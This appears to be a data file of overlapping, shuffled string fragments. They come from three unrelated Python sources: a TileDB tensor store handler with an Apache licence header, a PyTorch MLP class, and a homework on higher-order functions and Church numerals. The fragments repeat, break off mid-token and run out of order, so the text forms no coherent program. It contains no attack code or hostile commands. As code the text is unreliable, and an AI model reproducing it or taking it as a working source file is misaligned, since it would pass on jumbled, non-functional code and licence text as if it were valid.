shape=chunk.shape) def register_data_store_handler(): from", "by applicable law or agreed to in writing, software #", "# distributed under the License is distributed on an \"AS", "OF ANY KIND, either express or implied. # See the", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "no cover tiledb = None from ...lib.sparse import SparseNDArray from", "may obtain a copy of the License at # #", "# Unless required by applicable law or agreed to in", "ANY KIND, either express or implied. # See the License", "See the License for the specific language governing permissions and", "and # limitations under the License. import numpy as np", "the License. # You may obtain a copy of the", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "for the specific language governing permissions and # limitations under", "if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp)", "# Copyright 1999-2018 Alibaba Group Holding Ltd. # # Licensed", "0: with tiledb.SparseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr: if", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "to in writing, software # distributed under the License is", "= chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset + axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w',", "# dense to_store = np.ascontiguousarray(ctx[chunk.op.input.key]) slcs = [] for axis", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "# See the License for the specific language governing permissions", "import sps from ..expressions import datastore from .utils import get_tiledb_ctx", "import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri =", "import SparseNDArray from ...lib.sparse.core import sps from ..expressions import datastore", "def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config) uri = chunk.op.tiledb_uri key", "= chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if not", "key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,)", "mode='w', key=key, timestamp=timestamp) as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] =", "== 1: vec = to_store.col if to_store.shape[0] == 1 else", "You may obtain a copy of the License at #", "slcs = [] for axis in range(chunk.ndim): axis_offset = axis_offsets[axis]", "may not use this file except in compliance with the", "or agreed to in writing, software # distributed under the", "as arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim,", "arr: arr[tuple(slcs)] = to_store ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype)", "Group Holding Ltd. # # Licensed under the Apache License,", "required by applicable law or agreed to in writing, software", "uri = chunk.op.tiledb_uri key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets", "= [] for axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length", "= None from ...lib.sparse import SparseNDArray from ...lib.sparse.core import sps", "in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length = chunk.op.input.shape[axis] slcs.append(slice(axis_offset, axis_offset", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "+ axis_length)) with tiledb.DenseArray(tiledb_ctx, uri, mode='w', key=key, timestamp=timestamp) as arr:", "from ..expressions import datastore from .utils import get_tiledb_ctx def _store_tiledb(ctx,", "with the License. # You may obtain a copy of", "this file except in compliance with the License. # You", "0), dtype=chunk.dtype), shape=chunk.shape) def register_data_store_handler(): from ...executor import register register(datastore.TensorTileDBDataStore,", "import tiledb except ImportError: # pragma: no cover tiledb =", "the Apache License, Version 2.0 (the \"License\"); # you may", "sparse to_store = ctx[chunk.op.input.key].spmatrix.tocoo() if to_store.nnz > 0: with tiledb.SparseArray(tiledb_ctx,", "to_store.data else: i, j = to_store.row + axis_offsets[0], to_store.col +", "from .utils import get_tiledb_ctx def _store_tiledb(ctx, chunk): tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config)", "[] for axis in range(chunk.ndim): axis_offset = axis_offsets[axis] axis_length =", "key = chunk.op.tiledb_key timestamp = chunk.op.tiledb_timestamp axis_offsets = chunk.op.axis_offsets if", "# limitations under the License. import numpy as np try:" ]
[ "x.view(-1, self.input_size) out = x for layer in self.linears: out", "zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True) self.act = activation[act_func]", "self.act = activation[act_func] self.train_alg=train_alg # list of layers in the", "<gh_stars>1-10 import torch import torch.nn as nn import torch.nn.functional as", "of integers, a list object containing number of units for", "self.train_alg=train_alg # list of layers in the network self.layers =", "# list of layers in the network self.layers = [layer", "------------------ - input_size: integer, the number of features in the", "[input_size] + hidden_sizes self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True) for in_size,", "in self.linears: out = self.act(layer(out)) logits = self.output_layer(out) return logits", "import activation class MLP(PeGradNet): def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid',", "input_size layer_sizes = [input_size] + hidden_sizes self.linears = nn.ModuleList([Linear(in_size, out_size,", "use for each hidden layer - train_alg: string, allowed values", "act_func: string, name of activation function to use for each", "= activation[act_func] self.train_alg=train_alg # list of layers in the network", "a list of integers, a list object containing number of", "layer in self.linears] self.layers.append(self.output_layer) def forward(self, x): x = x.view(-1,", "x = x.view(-1, self.input_size) out = x for layer in", "= x.view(-1, self.input_size) out = x for layer in self.linears:", "class MLP(PeGradNet): def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'): \"\"\"", "'naive'} \"\"\" super(MLP, self).__init__() self.input_size = input_size layer_sizes = [input_size]", "import torch.nn.functional as F from fastgc.model.penet import PeGradNet from fastgc.layers.linear", "activation class MLP(PeGradNet): def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'):", "+ hidden_sizes self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True) for in_size, out_size", "of output vector - act_func: string, name of activation function", "PeGradNet from fastgc.layers.linear import Linear from fastgc.activation import activation class", "to use for each hidden layer - train_alg: string, allowed", "x): x = x.view(-1, self.input_size) out = x for layer", "as F from fastgc.model.penet import PeGradNet from fastgc.layers.linear import Linear", "function to use for each hidden layer - train_alg: string,", "for layer in self.linears] self.layers.append(self.output_layer) def forward(self, x): x =", "forward(self, x): x = x.view(-1, self.input_size) out = x for", "vector - act_func: string, name of activation function to use", "for hidden layers - output_size: an integer, the length of", "hidden layer - train_alg: string, allowed values are {'batch', 'reweight',", "self.linears] self.layers.append(self.output_layer) def forward(self, x): x = x.view(-1, self.input_size) out", "an integer, the length of output vector - act_func: string,", "number of units for hidden layers - output_size: an integer,", "layer - train_alg: string, allowed values are {'batch', 'reweight', 'naive'}", "object containing number of units for hidden layers - output_size:", "the length of output vector - act_func: string, name of", "Linear(hidden_sizes[-1], output_size, bias=True) self.act = activation[act_func] self.train_alg=train_alg # list of", "bias=True) self.act = activation[act_func] self.train_alg=train_alg # list of layers in", "train_alg: string, allowed values are {'batch', 'reweight', 'naive'} \"\"\" super(MLP,", "act_func='sigmoid', train_alg='batch'): \"\"\" Parameters: ------------------ - input_size: integer, the number", "\"\"\" Parameters: ------------------ - input_size: integer, the number of features", "= [input_size] + hidden_sizes self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True) for", "for layer in self.linears: out = self.act(layer(out)) logits = self.output_layer(out)", "hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'): \"\"\" Parameters: ------------------ - input_size: integer,", "for in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1], output_size,", "integer, the length of output vector - act_func: string, name", "string, name of activation function to use for each hidden", "allowed values are {'batch', 'reweight', 'naive'} \"\"\" super(MLP, self).__init__() self.input_size", "in self.linears] self.layers.append(self.output_layer) def forward(self, x): x = x.view(-1, self.input_size)", "from fastgc.model.penet import PeGradNet from fastgc.layers.linear import Linear from fastgc.activation", "in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True)", "in the network self.layers = [layer for layer in self.linears]", "torch.nn as nn import torch.nn.functional as F from fastgc.model.penet import", "units for hidden layers - output_size: an integer, the length", "= [layer for layer in self.linears] self.layers.append(self.output_layer) def forward(self, x):", "in the input - hidden_sizes: a list of integers, a", "fastgc.model.penet import PeGradNet from fastgc.layers.linear import Linear from fastgc.activation import", "each hidden layer - train_alg: string, allowed values are {'batch',", "Parameters: ------------------ - input_size: integer, the number of features in", "nn import torch.nn.functional as F from fastgc.model.penet import PeGradNet from", "output_size: an integer, the length of output vector - act_func:", "input_size: integer, the number of features in the input -", "- hidden_sizes: a list of integers, a list object containing", "- train_alg: string, allowed values are {'batch', 'reweight', 'naive'} \"\"\"", "train_alg='batch'): \"\"\" Parameters: ------------------ - input_size: integer, the number of", "bias=True) for in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1],", "out = x for layer in self.linears: out = self.act(layer(out))", "from fastgc.layers.linear import Linear from fastgc.activation import activation class MLP(PeGradNet):", "{'batch', 'reweight', 'naive'} \"\"\" super(MLP, self).__init__() self.input_size = input_size layer_sizes", "activation function to use for each hidden layer - train_alg:", "Linear from fastgc.activation import activation class MLP(PeGradNet): def __init__(self, input_size,", "= input_size layer_sizes = [input_size] + hidden_sizes self.linears = nn.ModuleList([Linear(in_size,", "hidden_sizes self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True) for in_size, out_size in", "network self.layers = [layer for layer in self.linears] self.layers.append(self.output_layer) def", "torch.nn.functional as F from fastgc.model.penet import PeGradNet from fastgc.layers.linear import", "as nn import torch.nn.functional as F from fastgc.model.penet import PeGradNet", "layer in self.linears: out = self.act(layer(out)) logits = self.output_layer(out) return", "layers in the network self.layers = [layer for layer in", "containing number of units for hidden layers - output_size: an", "hidden_sizes: a list of integers, a list object containing number", "of layers in the network self.layers = [layer for layer", "import torch.nn as nn import torch.nn.functional as F from fastgc.model.penet", "self.input_size = input_size layer_sizes = [input_size] + hidden_sizes self.linears =", "fastgc.activation import activation class MLP(PeGradNet): def __init__(self, input_size, hidden_sizes, output_size,", "output_size, bias=True) self.act = activation[act_func] self.train_alg=train_alg # list of layers", "nn.ModuleList([Linear(in_size, out_size, bias=True) for in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer", "\"\"\" super(MLP, self).__init__() self.input_size = input_size layer_sizes = [input_size] +", "out_size in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True) self.act", "torch import torch.nn as nn import torch.nn.functional as F from", "import torch import torch.nn as nn import torch.nn.functional as F", "name of activation function to use for each hidden layer", "super(MLP, self).__init__() self.input_size = input_size layer_sizes = [input_size] + hidden_sizes", "from fastgc.activation import activation class MLP(PeGradNet): def __init__(self, input_size, hidden_sizes,", "- input_size: integer, the number of features in the input", "input_size, hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'): \"\"\" Parameters: ------------------ - input_size:", "the network self.layers = [layer for layer in self.linears] self.layers.append(self.output_layer)", "features in the input - hidden_sizes: a list of integers,", "= x for layer in self.linears: out = self.act(layer(out)) logits", "input - hidden_sizes: a list of integers, a list object", "list object containing number of units for hidden layers -", "import PeGradNet from fastgc.layers.linear import Linear from fastgc.activation import activation", "[layer for layer in self.linears] self.layers.append(self.output_layer) def forward(self, x): x", "integer, the number of features in the input - hidden_sizes:", "layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True) self.act = activation[act_func] self.train_alg=train_alg", "activation[act_func] self.train_alg=train_alg # list of layers in the network self.layers", "- output_size: an integer, the length of output vector -", "of activation function to use for each hidden layer -", "= nn.ModuleList([Linear(in_size, out_size, bias=True) for in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])])", "out_size, bias=True) for in_size, out_size in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer =", "in zip(layer_sizes[:-1], layer_sizes[1:])]) self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True) self.act =", "a list object containing number of units for hidden layers", "self).__init__() self.input_size = input_size layer_sizes = [input_size] + hidden_sizes self.linears", "output_size, act_func='sigmoid', train_alg='batch'): \"\"\" Parameters: ------------------ - input_size: integer, the", "def forward(self, x): x = x.view(-1, self.input_size) out = x", "= Linear(hidden_sizes[-1], output_size, bias=True) self.act = activation[act_func] self.train_alg=train_alg # list", "of features in the input - hidden_sizes: a list of", "the input - hidden_sizes: a list of integers, a list", "- act_func: string, name of activation function to use for", "x for layer in self.linears: out = self.act(layer(out)) logits =", "length of output vector - act_func: string, name of activation", "list of integers, a list object containing number of units", "MLP(PeGradNet): def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'): \"\"\" Parameters:", "hidden layers - output_size: an integer, the length of output", "self.layers = [layer for layer in self.linears] self.layers.append(self.output_layer) def forward(self,", "__init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'): \"\"\" Parameters: ------------------ -", "values are {'batch', 'reweight', 'naive'} \"\"\" super(MLP, self).__init__() self.input_size =", "number of features in the input - hidden_sizes: a list", "def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid', train_alg='batch'): \"\"\" Parameters: ------------------", "self.layers.append(self.output_layer) def forward(self, x): x = x.view(-1, self.input_size) out =", "string, allowed values are {'batch', 'reweight', 'naive'} \"\"\" super(MLP, self).__init__()", "for each hidden layer - train_alg: string, allowed values are", "the number of features in the input - hidden_sizes: a", "integers, a list object containing number of units for hidden", "self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True) for in_size, out_size in zip(layer_sizes[:-1],", "import Linear from fastgc.activation import activation class MLP(PeGradNet): def __init__(self,", "fastgc.layers.linear import Linear from fastgc.activation import activation class MLP(PeGradNet): def", "are {'batch', 'reweight', 'naive'} \"\"\" super(MLP, self).__init__() self.input_size = input_size", "F from fastgc.model.penet import PeGradNet from fastgc.layers.linear import Linear from", "output vector - act_func: string, name of activation function to", "of units for hidden layers - output_size: an integer, the", "layer_sizes = [input_size] + hidden_sizes self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True)", "self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True) self.act = activation[act_func] self.train_alg=train_alg #", "self.input_size) out = x for layer in self.linears: out =", "layers - output_size: an integer, the length of output vector", "'reweight', 'naive'} \"\"\" super(MLP, self).__init__() self.input_size = input_size layer_sizes =", "list of layers in the network self.layers = [layer for" ]
[ "-- a function that takes one argument to produce the", "the sum of f(1) + ... + f(n). The implementation", "***\" return lambda x: f(f(x)) three = successor(two) def church_to_int(n):", "3^2 * 4^2 * 5^2 14400 >>> product(3, increment) #", "identity = lambda x: x triple = lambda x: 3", "Church numerals m and n. >>> four = successor(three) >>>", "return lambda f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral", "** n, for Church numerals m and n. >>> church_to_int(pow_church(two,", "Homework 2: Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator", ">>> make_repeater(square, 0)(5) # Yes, it makes sense to apply", "x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church numeral for", "2 + 3 + 4 + 5 26 >>> accumulate(add,", "k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation", "n): \"\"\"Return the Church numeral for m + n, for", "that f(x) = h(g(x)).\"\"\" def f(x): return h(g(x)) return f", "times! 5 \"\"\" \"*** YOUR CODE HERE ***\" def repeater(x):", "120 >>> product(3, square) # 1^2 * 2^2 * 3^2", "n): \"\"\"Return the Church numeral for m * n, for", "* n, for Church numerals m and n. >>> four", "Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import add, mul, sub", "function that takes one argument to produce the term >>>", "and n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9", "2^2 * 3^2 * 4^2 * 5^2 14400 >>> product(3,", "+ 2 + 3 + 4 + 5 15 >>>", "***\" result, k = base,1 while k <= n: result,", "\"\"\"An implementation of product using accumulate. >>> product_using_accumulate(4, square) 576", "x, y: 2 * (x + y), 2, 3, square)", "square) 576 >>> product_using_accumulate(6, triple) 524880 >>> from construct_check import", "+ f(n). The implementation uses accumulate. >>> summation_using_accumulate(5, square) 55", "* 3^2 36 >>> product(5, square) # 1^2 * 2^2", "YOUR CODE HERE ***\" # result, k = 0, 1", "of the first n terms in a sequence. n --", "25 >>> accumulate(mul, 2, 3, square) # 2 * 1^2", "2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625", "def two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR", "f: lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church", ">>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"***", "such that f(x) = h(g(x)).\"\"\" def f(x): return h(g(x)) return", "accumulate(lambda x, y: x + y + 1, 2, 3,", "11 >>> accumulate(add, 11, 3, square) # 11 + 1^2", "def product_using_accumulate(n, f): \"\"\"An implementation of product using accumulate. >>>", "for Church numerals m and n. >>> four = successor(three)", "g): \"\"\"Return a function f, such that f(x) = h(g(x)).\"\"\"", ">>> church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\"", "successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return lambda x: f(f(x))", "3, square) 58 >>> accumulate(lambda x, y: (x + y)", "2: Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import", "triple = lambda x: 3 * x increment = lambda", "k <= n: result,k = h(result), k + 1 return", "\"\"\"Return the Church numeral for m * n, for Church", "square) # 1^2 * 2^2 * 3^2 36 >>> product(5,", ">>> add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3 * 3", "4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes, it", "accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a function f, such that", "pow_church(m, n): \"\"\"Return the Church numeral m ** n, for", "\"\"\" Homework 2: Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from", "15 >>> accumulate(add, 11, 5, identity) # 11 + 1", "* 3 * 1 243 >>> make_repeater(square, 2)(5) # square(square(5))", "* 3^2 * 4^2 * 5^2 14400 >>> product(3, increment)", "CODE HERE ***\" def repeater(x): result, k = x,1 while", "+ 1)(0) def add_church(m, n): \"\"\"Return the Church numeral for", "m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church numeral for m", "+ 5 26 >>> accumulate(add, 11, 0, identity) # 11", "\"*** YOUR CODE HERE ***\" return lambda f: lambda x:", "= result + f(k), k + 1 return accumulate(add,0,n,f) def", "f): \"\"\"An implementation of product using accumulate. >>> product_using_accumulate(4, square)", "n: result,k = f(k)*result, k + 1 return result def", "product(3, triple) # 1*3 * 2*3 * 3*3 162 \"\"\"", "5 15 >>> accumulate(add, 11, 5, identity) # 11 +", "the function that computes the nth application of h. >>>", "result * f(k), k + 1 return accumulate(mul,1,n,f) def compose1(h,", "n to a Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one)", "CODE HERE ***\" return n(lambda x: x + 1)(0) def", "(3+1) 24 >>> product(3, triple) # 1*3 * 2*3 *", ">>> four = successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three,", "as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return lambda x:", "result, k = 1, 1 # while k <= n:", "lambda f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1:", "first n terms in a sequence and base. The terms", "###################### # Required Questions # ###################### def product(n, f): \"\"\"Return", "* 4^2 * 5^2 14400 >>> product(3, increment) # (1+1)", "combined are f(1), f(2), ..., f(n). combiner is a two-argument", "x, y: x + y + 1, 2, 3, square)", "add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3 * 3 *", "+ 1, 2, 3, square) 19 >>> accumulate(lambda x, y:", "The terms to be combined are f(1), f(2), ..., f(n).", "n, for Church numerals m and n. >>> church_to_int(pow_church(two, three))", ">>> accumulate(mul, 2, 3, square) # 2 * 1^2 *", "zero times! 5 \"\"\" \"*** YOUR CODE HERE ***\" def", "CODE HERE ***\" # result, k = 0, 1 #", "result + f(k), k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n,", "f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same", "def f(x): return h(g(x)) return f def make_repeater(h, n): \"\"\"Return", "using accumulate. >>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple) 524880", "check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR", "\"\"\"Convert the Church numeral n to a Python integer. >>>", "2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE ***\"", "result, k = base,1 while k <= n: result, k", "def add_church(m, n): \"\"\"Return the Church numeral for m +", "3^2 72 >>> accumulate(lambda x, y: x + y +", "YOUR CODE HERE ***\" return lambda x: f(x) def two(f):", "CODE HERE ***\" return lambda f: m(n(f)) def pow_church(m, n):", "x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\"", "f): \"\"\"Return the product of the first n terms in", "to be combined are f(1), f(2), ..., f(n). combiner is", "% 17, 19, 20, square) 16 \"\"\" \"*** YOUR CODE", "k = result * f(k), k + 1 return accumulate(mul,1,n,f)", "***\" def repeater(x): result, k = x,1 while k <=", "make_repeater(increment, 3) >>> add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3", "3 6 >>> product(5, identity) # 1 * 2 *", "Questions # ###################### def product(n, f): \"\"\"Return the product of", "########################## def zero(f): return lambda x: x def successor(n): return", "in a sequence and base. The terms to be combined", "\"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE", "YOUR CODE HERE ***\" return lambda x: f(f(x)) three =", "(x + y) % 17, 19, 20, square) 16 \"\"\"", "19 >>> accumulate(lambda x, y: 2 * (x + y),", "church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR", "application of h. >>> add_three = make_repeater(increment, 3) >>> add_three(5)", "= lambda x: x + 1 ###################### # Required Questions", "n: # result, k = result * f(k), k +", "f(k), k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An", "58 >>> accumulate(lambda x, y: (x + y) % 17,", "x: f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert the Church", "1 # while k <= n: # result, k =", "ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For',", "terms in a sequence and base. The terms to be", "x + y + 1, 2, 3, square) 19 >>>", "'hw02.py' from operator import add, mul, sub square = lambda", "check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR", "# 11 11 >>> accumulate(add, 11, 3, square) # 11", "church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE", "+ y) % 17, 19, 20, square) 16 \"\"\" \"***", "***\" # result, k = 1, 1 # while k", "3, square) # 2 * 1^2 * 2^2 * 3^2", "and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True", "... + f(n). The implementation uses accumulate. >>> summation_using_accumulate(5, square)", ">>> add_three = make_repeater(increment, 3) >>> add_three(5) 8 >>> make_repeater(triple,", "# ########################## def zero(f): return lambda x: x def successor(n):", "'For', 'While']) True \"\"\" \"*** YOUR CODE HERE ***\" #", "\"*** YOUR CODE HERE ***\" return lambda f: m(n(f)) def", "triple) 45 >>> from construct_check import check >>> # ban", "1 ###################### # Required Questions # ###################### def product(n, f):", "###################### def product(n, f): \"\"\"Return the product of the first", "x: f(x) def two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\"", "f(x) def two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"***", "+ 3^2 25 >>> accumulate(mul, 2, 3, square) # 2", "n terms in a sequence and base. The terms to", "mul_church(m, n): \"\"\"Return the Church numeral for m * n,", "CODE HERE ***\" # result, k = 1, 1 #", "k = base,1 while k <= n: result, k =", ">>> accumulate(add, 11, 5, identity) # 11 + 1 +", "# (1+1) * (2+1) * (3+1) 24 >>> product(3, triple)", "1 return result def summation_using_accumulate(n, f): \"\"\"Returns the sum of", "and base. The terms to be combined are f(1), f(2),", "repeater ########################## # Just for fun Questions # ########################## def", "\"\"\" \"*** YOUR CODE HERE ***\" result, k = base,1", "return h(g(x)) return f def make_repeater(h, n): \"\"\"Return the function", "function. >>> accumulate(add, 0, 5, identity) # 0 + 1", "product(n, f): \"\"\"Return the product of the first n terms", "m and n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR", "lambda x: x * x identity = lambda x: x", "* 3 6 >>> product(5, identity) # 1 * 2", "n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE HERE", "625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5)", "and n. >>> four = successor(three) >>> church_to_int(mul_church(two, three)) 6", "# Required Questions # ###################### def product(n, f): \"\"\"Return the", "k <= n: result,k = f(k)*result, k + 1 return", "2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return", "import add, mul, sub square = lambda x: x *", "return lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return", "2, 3, square) 58 >>> accumulate(lambda x, y: (x +", "successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return lambda x: f(x)", "Church numeral m ** n, for Church numerals m and", "k + 1 return result return repeater ########################## # Just", "19, 20, square) 16 \"\"\" \"*** YOUR CODE HERE ***\"", "1 * 2 * 3 6 >>> product(5, identity) #", ">>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE HERE ***\"", ">>> make_repeater(square, 2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5) #", "# 3 * 3 * 3 * 3 * 3", "= result * f(k), k + 1 return accumulate(mul,1,n,f) def", "YOUR CODE HERE ***\" # result, k = 1, 1", "1, 1 # while k <= n: # result, k", "result,k = f(k)*result, k + 1 return result def accumulate(combiner,", "5 26 >>> accumulate(add, 11, 0, identity) # 11 11", "k <= n: # result, k = result * f(k),", "to a Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1", "Required Questions # ###################### def product(n, f): \"\"\"Return the product", "integer f -- a function that takes one argument to", "HERE ***\" # result, k = 0, 1 # while", "1)(0) def add_church(m, n): \"\"\"Return the Church numeral for m", ">>> product(3, identity) # 1 * 2 * 3 6", "Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two)", "make_repeater(square, 2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5))))", "= 0, 1 # while k <= n: # result,", "add_church(m, n): \"\"\"Return the Church numeral for m + n,", "* 3*3 162 \"\"\" \"*** YOUR CODE HERE ***\" result,k", "\"\"\"Return the result of combining the first n terms in", "+ y + 1, 2, 3, square) 19 >>> accumulate(lambda", "sequence. n -- a positive integer f -- a function", "k = 1, 1 # while k <= n: #", "<= n: result,k = h(result), k + 1 return result", "product_using_accumulate(n, f): \"\"\"An implementation of product using accumulate. >>> product_using_accumulate(4,", "return result return repeater ########################## # Just for fun Questions", "def compose1(h, g): \"\"\"Return a function f, such that f(x)", "accumulate(add, 11, 5, identity) # 11 + 1 + 2", "make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3", "2 * 1^2 * 2^2 * 3^2 72 >>> accumulate(lambda", "3 + 4 + 5 26 >>> accumulate(add, 11, 0,", "0, 1 # while k <= n: # result, k", "<= n: # result, k = result * f(k), k", "f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert the Church numeral", "3 + 4 + 5 15 >>> accumulate(add, 11, 5,", "x, y: (x + y) % 17, 19, 20, square)", "2^2 * 3^2 72 >>> accumulate(lambda x, y: x +", ">>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple) 45 >>> from", "***\" return lambda x: f(x) def two(f): \"\"\"Church numeral 2:", "26 >>> accumulate(add, 11, 0, identity) # 11 11 >>>", "lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the", "1^2 * 2^2 * 3^2 36 >>> product(5, square) #", "YOUR CODE HERE ***\" result,k = 1,1 while k <=", "the first n terms in a sequence. n -- a", "11 + 1^2 + 2^2 + 3^2 25 >>> accumulate(mul,", "3^2 36 >>> product(5, square) # 1^2 * 2^2 *", ">>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE HERE ***\"", "church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE HERE ***\" return", "base, n, f): \"\"\"Return the result of combining the first", "recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\"", "church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE HERE ***\" return", "0 >>> church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three) 3", "2 + 3 + 4 + 5 15 >>> accumulate(add,", "accumulate(lambda x, y: (x + y) % 17, 19, 20,", "lambda x: x + 1 ###################### # Required Questions #", "* 1 243 >>> make_repeater(square, 2)(5) # square(square(5)) 625 >>>", "0, 5, identity) # 0 + 1 + 2 +", "for Church numerals m and n. >>> church_to_int(add_church(two, three)) 5", "576 >>> product_using_accumulate(6, triple) 524880 >>> from construct_check import check", "n. >>> four = successor(three) >>> church_to_int(mul_church(two, 